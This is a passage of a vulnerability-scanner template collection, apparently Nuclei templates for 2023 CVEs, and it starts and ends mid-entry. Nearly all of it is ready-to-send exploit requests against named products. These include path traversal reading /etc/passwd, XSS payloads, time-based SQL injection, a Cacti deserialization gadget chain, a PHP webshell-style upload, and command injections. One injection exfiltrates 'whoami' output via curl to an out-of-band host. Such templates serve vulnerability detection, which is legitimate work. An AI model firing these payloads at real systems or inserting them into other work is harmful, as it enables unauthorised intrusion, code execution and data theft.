/userentry?accountId=/../../../tomcat/webapps/{{directory}}/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{ hex_decode('789c0bf06666e16200819c8abcf02241510f4e201b84851864189cc35c758d0c8c8c754dcc8d4cccf44a2a4a42433819981fdb05a79e63f34b2dade0666064f9cac8c0c0023201a83a3ec43538842bc09b91498e1997b1126071a026862d8d506d1896b0422c41b320c09b950da2979121024887824d02000d3f1fcb') }}\n","@timeout: 15\nGET /{{directory}}/CVE-2023-47246.txt?{{wait_for(9)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200"]}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-35160","info":{"name":"XWiki >= 2.5-milestone-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)","{{BaseURL}}/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"javascript:alert(document.domain)\"","XWikiGuest"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-43325","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-46359","info":{"name":"cPH2 Charging Station v1.87.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>SUCCESS</b>","127.0.0.1 && curl http://$(whoami).{{interactsh-url}}"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-35162","info":{"name":"XWiki < 14.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"name=\\\"xcontinue\\\" value=\\\"javascript:alert(document.domain)\")","contains(body, \"previewactions.vm\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-41599","info":{"name":"JFinalCMS v5.0.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-30534","info":{"name":"Cacti < 1.2.25 Insecure Deserialization","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}\n","POST /managers.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}\n","GET /clog.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_4","regex":["<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","part":"body","group":1,"regex":["var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"],"internal":true}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"oast.me"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://oast.me/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-39002","info":{"name":"OPNsense - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1\n","GET /system_certmanager.php?act=%22%3E%3Csvg/onload=alert(document.domain)%3E&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"><svg/onload=alert(window.origin)> \"/>"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"para","part":"body","group":1,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true},{"type":"regex","name":"value","part":"body","group":2,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-48084","info":{"name":"Nagios XI < 5.11.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","@timeout: 15s\nGET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_3>=5","contains(body_3, \"Home Dashboard</a>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","part":"body","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true}]}]},{"id":"CVE-2023-3710","info":{"name":"Honeywell PM43 Printers - Command Injection","severity":"critical"},"requests":[{"raw":["POST /loadfile.lp?pageid=Configure HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"word","part":"body","words":["Release date"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38194","info":{"name":"SuperWebMailer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<img src=1 onerror=alert(document.domain) />\")","contains(tolower(body_1), \"superwebmailer\")","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"critical"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36144","info":{"name":"Intelbras Switch - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/exportCfgwithpasswd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System Description","System Version","System Name"],"condition":"and"},{"type":"word","part":"header","words":["attachment;filename="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44393","info":{"name":"Piwigo - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=plugins&tab=new&installstatus=ok&plugin_id=nfez2%22%3E%3Cscript%3Eprompt(document.domain)%3C%2fscript%3Ehkugi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>prompt(document.domain)</script>","The plugin has been successfully copied"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34756","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body_2, 'Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-22232","info":{"name":"Adobe Connect < 12.1.5 - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"],"matchers-condition":"and","matchers":[{"type":"word","words":["Save to My Computer","exam.pdf","Click to Download"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-51449","info":{"name":"Gradio Hugging Face - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"files\";filename=\"okmijnuhbygv\"\nContent-Type: application/octet-stream\n\n{{str}}\n-----------------------------250033711231076532771336998311--\n","GET /file={{download_path}}{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\\[\"(.+)okmijnuhbygv\"\\]"]}],"payloads":{"path":["..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","../../../../../../../../../../../../../../../etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3849","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find-a-matchpksyk\"><img%20src%3da%20onerror%3dalert(document.cookie)>s9a64?"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, \"><img src=a onerror=alert(document.cookie)>s9a64\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-37979","info":{"name":"Ninja Forms < 3.6.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"<img src=onerror=alert(document.domain)>\") && contains(body_2, \"import_form_template\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-4415","info":{"name":"Ruijie RG-EW1200G Router Background - Login Bypass","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/login"],"body":"{\n  \"username\":\"2\",\n  \"password\":\"admin\",\n  \"timestamp\":1695218596000\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\"","\"msg\":\"\u767b\u5165\u6210\u529f\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22432","info":{"name":"Web2py URL - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/default/index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npassword={{password}}&send=%5C%2F%5C%2Foast.pro&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["a href=\"\\/\\/oast.pro\""]},{"type":"word","part":"location","words":["\\/\\/oast.pro"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35155","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/Main/?viewer=share&send=1&target=&target=%3Cimg+src+onerror%3Dalert%28document.domain%29%3E&includeDocument=inline&message={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Applications</h2>","Navigation</h2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6360","info":{"name":"WordPress My Calendar <3.4.22 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar"]}]},{"raw":["@timeout: 20s\nGET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains(body, \"[]\")","duration >= 6"],"condition":"and"}]}]},{"id":"CVE-2023-1408","info":{"name":"Video List Manager <= 1.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"Edit Video\",\"Youtube</option>\")"],"condition":"and"}]}]},{"id":"CVE-2023-5830","info":{"name":"ColumbiaSoft DocumentLocator - Improper Authentication","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /api/authentication/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\n  \"LoginType\":\"differentWindows\",\n  \"User\":\"{{randstr}}\",\n  \"Password\":\"{{rand_base(5, \"abc\")}}\",\n  \"Domain\":\"{{randstr}}\",\n  \"Server\":\"{{interactsh-url}}\",\n  \"Repository\":\"{{randstr}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"Authorized\":false"]}]}]},{"id":"CVE-2023-34993","info":{"name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: 